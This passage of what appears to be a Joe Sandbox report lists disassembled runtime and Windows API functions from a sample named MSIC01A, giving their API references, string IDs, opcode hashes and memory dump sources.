                                                                                                                                                                        • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                        • API String ID: 2544715827-2799312399
                                                                                                                                                                        • Opcode ID: d3ed3ce00de6da83f4c1a4a2663802c2088fc254ec2b4527ae4029f96cb5b519
                                                                                                                                                                        • Instruction ID: b28642ffa36305a222e5ac1d4080302da44ae99ce4763b21f33fb81c7f325061
                                                                                                                                                                        • Opcode Fuzzy Hash: d3ed3ce00de6da83f4c1a4a2663802c2088fc254ec2b4527ae4029f96cb5b519
                                                                                                                                                                        • Instruction Fuzzy Hash: 56C18F35E042889EDF25DBB8C8407ECBBB2AF55320F294069E8856B3C7C7749D85EB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F462C8
                                                                                                                                                                          • Part of subcall function 00F42D74: __EH_prolog3.LIBCMT ref: 00F42D7B
                                                                                                                                                                          • Part of subcall function 00F42D74: std::_Lockit::_Lockit.LIBCPMT ref: 00F42D85
                                                                                                                                                                          • Part of subcall function 00F42D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00F42DF6
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F46502
                                                                                                                                                                        Strings
                                                                                                                                                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F4633F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                        • API String ID: 2544715827-2799312399
                                                                                                                                                                        • Opcode ID: 028d0d592a0552ecc1357c9bc8303b4b20c0b78e03a9b4be12bb49d4cfdf7f21
                                                                                                                                                                        • Instruction ID: 0fa03c27b7eaf24da48848d151da7b90cd2649181cb596d69bc7419f967b0e09
                                                                                                                                                                        • Opcode Fuzzy Hash: 028d0d592a0552ecc1357c9bc8303b4b20c0b78e03a9b4be12bb49d4cfdf7f21
                                                                                                                                                                        • Instruction Fuzzy Hash: 40C19370E042588ADF25DF68C8417BCBFB1BF16314F588099DC89EB286DB349C85EB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4669E
                                                                                                                                                                          • Part of subcall function 00F3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00F3B8DD
                                                                                                                                                                          • Part of subcall function 00F3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00F3B900
                                                                                                                                                                          • Part of subcall function 00F3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B928
                                                                                                                                                                          • Part of subcall function 00F3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B9B7
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F468D8
                                                                                                                                                                        Strings
                                                                                                                                                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F46715
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                        • API String ID: 3042121994-2799312399
                                                                                                                                                                        • Opcode ID: 01fcb1838a07d193ea8efc2226609bd96879ed11dc4e1a4ac537a093feb20da4
                                                                                                                                                                        • Instruction ID: 0ac4b3745aa7a34a63068922a4012f1bac3030f2d7185fefaa1111a051f2357d
                                                                                                                                                                        • Opcode Fuzzy Hash: 01fcb1838a07d193ea8efc2226609bd96879ed11dc4e1a4ac537a093feb20da4
                                                                                                                                                                        • Instruction Fuzzy Hash: 25C18130E042588BDF25DF64C8517ACBFB2BF12314F548099DC89EB282DB788D85EB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00F61AFD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                        • String ID: pow
                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                        • Opcode ID: dc2709dc918e9e76310cf78198a6a277b94c5e44d2fa57aa3803b8a9c77382eb
                                                                                                                                                                        • Instruction ID: 5bf0a6f4a5c5073ab4dd1a24a1eaf3a91e0ed5e973ecf3bfe86dc056544bf0d1
                                                                                                                                                                        • Opcode Fuzzy Hash: dc2709dc918e9e76310cf78198a6a277b94c5e44d2fa57aa3803b8a9c77382eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 97515C61E49205CACB117754CE1237E77A0FB40721F284958E0D5922A9FA3A8CD5BE87
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                                        • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                        • API String ID: 3732870572-1956417402
                                                                                                                                                                        • Opcode ID: 194e6d676b7896fc27234fba76c0aa4acfd93a59577db7df8cae8972153aa65d
                                                                                                                                                                        • Instruction ID: b5b19d3837358485fb38d125b9cff2d672e449445ab5f4d94370fb687a996228
                                                                                                                                                                        • Opcode Fuzzy Hash: 194e6d676b7896fc27234fba76c0aa4acfd93a59577db7df8cae8972153aa65d
                                                                                                                                                                        • Instruction Fuzzy Hash: BC512230F04284ABDB258E6C88817BE7FF57F46362F14415AEE81D7281C374A94AE760
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00F3BF6E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 118556049-2658103896
                                                                                                                                                                        • Opcode ID: 3438cc7b02cfc3b665b2b0267e9f91f872c6f167da73d32409b4b5f45dda45e4
                                                                                                                                                                        • Instruction ID: 4c0b20f3768451d753a935661439597ab0e5da1f14d57ad2ad47b8c33471abe5
                                                                                                                                                                        • Opcode Fuzzy Hash: 3438cc7b02cfc3b665b2b0267e9f91f872c6f167da73d32409b4b5f45dda45e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 0951C3B1D007489FDB10DFA4CC41BEEBBB8FF05314F14426AE905AB241E774AA85DB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \\?\$\\?\UNC\
                                                                                                                                                                        • API String ID: 0-3019864461
                                                                                                                                                                        • Opcode ID: b3799a7538d38035ffcc9266724ddf971b42c088090bd8e8fc43303388dd98c2
                                                                                                                                                                        • Instruction ID: 5c8a718c065953b5729153001b842001ddaf64e9f65ce919f837978c3a0fc526
                                                                                                                                                                        • Opcode Fuzzy Hash: b3799a7538d38035ffcc9266724ddf971b42c088090bd8e8fc43303388dd98c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7551C3B1A143049BDB24EFA4CC45BEEB7B5FF45724F10451DE801A7280DBB5A984EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4D501
                                                                                                                                                                        • _swprintf.LIBCMT ref: 00F4D573
                                                                                                                                                                          • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                          • Part of subcall function 00F42FC8: __EH_prolog3.LIBCMT ref: 00F42FCF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                                        • String ID: %.0Lf
                                                                                                                                                                        • API String ID: 3050236999-1402515088
                                                                                                                                                                        • Opcode ID: ca0ecb6e588e30e2991599fc05f69a9c8f4c55c6cc1ea41b832adc33e984b927
                                                                                                                                                                        • Instruction ID: 54d6bc20734adda167996007d55e0a1b1a5fcf2dded29e76ef36e6e59942cb57
                                                                                                                                                                        • Opcode Fuzzy Hash: ca0ecb6e588e30e2991599fc05f69a9c8f4c55c6cc1ea41b832adc33e984b927
                                                                                                                                                                        • Instruction Fuzzy Hash: 74416972E00208ABCF05EFE4CC45AED7BB5FB08314F208449E845AB295EB799915EF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4D7A5
                                                                                                                                                                        • _swprintf.LIBCMT ref: 00F4D817
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                        • String ID: %.0Lf
                                                                                                                                                                        • API String ID: 1487807907-1402515088
                                                                                                                                                                        • Opcode ID: 2574dca44130a95da32d0e0b121ee40522de5db3cedffec1c75620d5430a54a2
                                                                                                                                                                        • Instruction ID: 3d2d3c6906d21ae752078375b394561f0407c76a3086619004a5e655f3bd44ea
                                                                                                                                                                        • Opcode Fuzzy Hash: 2574dca44130a95da32d0e0b121ee40522de5db3cedffec1c75620d5430a54a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D416972E00308ABCF05DFD4DC45AEE7BB5FB08310F208449E945AB295EB399915EF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F5188E
                                                                                                                                                                        • _swprintf.LIBCMT ref: 00F51900
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                        • String ID: %.0Lf
                                                                                                                                                                        • API String ID: 1487807907-1402515088
                                                                                                                                                                        • Opcode ID: 97fbf1766d9bd759b39759efd7bb179f76832808aac6d653b4868bea0191c611
                                                                                                                                                                        • Instruction ID: e3fb1121e732e19040d1d7a2378361600c1cfd4eb7bac8e54304a6986067a845
                                                                                                                                                                        • Opcode Fuzzy Hash: 97fbf1766d9bd759b39759efd7bb179f76832808aac6d653b4868bea0191c611
                                                                                                                                                                        • Instruction Fuzzy Hash: D9416872E00208ABCF05DFD4CC54ADD7BB5FF08311F208549E956AB291DB79AA19EF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F5607E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                        • Opcode ID: 6fe09968ef61dc34d205fecb5fbfb5ea40e1e932f57a947b368772b8ed934edb
                                                                                                                                                                        • Instruction ID: fac77c736c70cd524441625ddf2f4a97f3befc87d1abe2dadc758b11973ab9cc
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fe09968ef61dc34d205fecb5fbfb5ea40e1e932f57a947b368772b8ed934edb
                                                                                                                                                                        • Instruction Fuzzy Hash: F5418831D00609EFCF15DF98CC81AAEBBB6BF08311F188158FE18A7252D3399954EB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3___cftoe
                                                                                                                                                                        • String ID: !%x
                                                                                                                                                                        • API String ID: 855520168-1893981228
                                                                                                                                                                        • Opcode ID: 826f9ff01f41c2348e8f6cde7de7c48a8b565be0b8bb9adc0685f8b6e840c9c3
                                                                                                                                                                        • Instruction ID: d1f51bb882d5159283e69f32e07dab1cddc9589a650cac6eab93433c4b75d484
                                                                                                                                                                        • Opcode Fuzzy Hash: 826f9ff01f41c2348e8f6cde7de7c48a8b565be0b8bb9adc0685f8b6e840c9c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 11318B71D0020DEBDF04DF98E881AEEBBB6FF48314F104419F905A7251DB79AA49DB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3___cftoe
                                                                                                                                                                        • String ID: !%x
                                                                                                                                                                        • API String ID: 855520168-1893981228
                                                                                                                                                                        • Opcode ID: ee0aa8fd6db1a64965e9bbc616a427f0016edf76033f2694c67caf1cc178f137
                                                                                                                                                                        • Instruction ID: 09744c04664cd3f027451f50d36265e08ce6fe851eb23ad5b87494e88b3d52a5
                                                                                                                                                                        • Opcode Fuzzy Hash: ee0aa8fd6db1a64965e9bbc616a427f0016edf76033f2694c67caf1cc178f137
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A315A32D15258AFEF01DF98DC41BEEBBB5BF09311F100019F944A7242D779AA49EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00F35F86
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,72A902E8), ref: 00F35FF6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConvertFreeLocalString
                                                                                                                                                                        • String ID: Invalid SID
                                                                                                                                                                        • API String ID: 3201929900-130637731
                                                                                                                                                                        • Opcode ID: 2a2d9031059db65da200d6e9f5a466c4b523c256c1f999b7ce5acddb383f24ed
                                                                                                                                                                        • Instruction ID: f9de7a073d5be384f166f447d1e8f3002abe3b47d4f42f60c35e88cddef5f632
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a2d9031059db65da200d6e9f5a466c4b523c256c1f999b7ce5acddb383f24ed
                                                                                                                                                                        • Instruction Fuzzy Hash: ED21C070A047199BDB14DF68C815BAFBBF8FF44B24F10451EE405A7380D7B9AA049BD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3909B
                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F390FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                        • API String ID: 3988782225-1405518554
                                                                                                                                                                        • Opcode ID: b6672fcc79595a3920c9a233e232318889c22252fc1276031014371e63d37fe6
                                                                                                                                                                        • Instruction ID: 39be322fdf4d2a96a7d4467f1ee3a306f89ca62395949371f4395ae0dd7f21ce
                                                                                                                                                                        • Opcode Fuzzy Hash: b6672fcc79595a3920c9a233e232318889c22252fc1276031014371e63d37fe6
                                                                                                                                                                        • Instruction Fuzzy Hash: 1321C370805784DED721CF68C90478BBFF4EF15710F10869ED49597781D7B9A604D7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3_
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 2427045233-2658103896
                                                                                                                                                                        • Opcode ID: 6991ca4f5cf482074d95bbafa9318eac4364ef6c3e82ac7de85e8d92b766e746
                                                                                                                                                                        • Instruction ID: 0d093a449356a8607a440341b52527694960ecc4940a971a6568a5795e2e671e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6991ca4f5cf482074d95bbafa9318eac4364ef6c3e82ac7de85e8d92b766e746
                                                                                                                                                                        • Instruction Fuzzy Hash: E311D3B1D40B80AFC724EFB4D841B8ABBF4AF05310F04C51AE592DB241EB74E608EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00F34261,00F74400,000000FF,72A902E8,00000000,?,00000000,?,?,?,00F74400,000000FF,?,00F33A75,?), ref: 00F34096
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,40000022,72A902E8,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34154
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,3FFFFFFF,72A902E8,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34177
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F34217
